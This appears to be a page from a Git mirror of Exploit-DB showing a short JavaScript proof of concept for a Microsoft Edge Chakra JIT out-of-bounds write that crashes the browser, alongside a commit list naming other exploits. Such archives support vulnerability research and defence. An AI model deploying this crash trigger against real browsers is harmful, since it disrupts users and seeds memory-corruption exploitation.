exploit-db-mirror/exploits/windows/dos/45011.js at f3b60be22e10099589b300e9964c43b01db09b56 - bpmcdevitt/exploit-db-mirror - git_mcdevitt: Beyond coding. We Forge.

bpmcdevitt/exploit-db-mirror

Offensive Security e76244b41a DB: 2018-07-13

8 changes to exploits/shellcodes

Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow
Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow
Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes
Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read
Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions

VLC media player 2.2.8 - Arbitrary Code Execution (PoC)

Linux Kernel <  4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation

212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities
212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities

123 Flash Chat - Multiple Vulnerabilities
123 Flash Chat 7.8 - Multiple Vulnerabilities

Dicoogle PACS 2.5.0 - Directory Traversal

2018-07-13 05:02:00 +00:00

15 lines

No EOL

325 B

JavaScript

Raw Blame History

 /*
 It seems that this issue is similar to the  issue 1429  (MSRC 42111). It might need to refresh the page several times to observe a crash.
 PoC:
 */
 let arr = new Uint32Array(1000);
 for (let i = 0; i < 0x1000000; i++) {
     for (let j = 0; j < 1; j++) {
         i--;
         i++;
     }
     arr[i] = 0x1234;
 }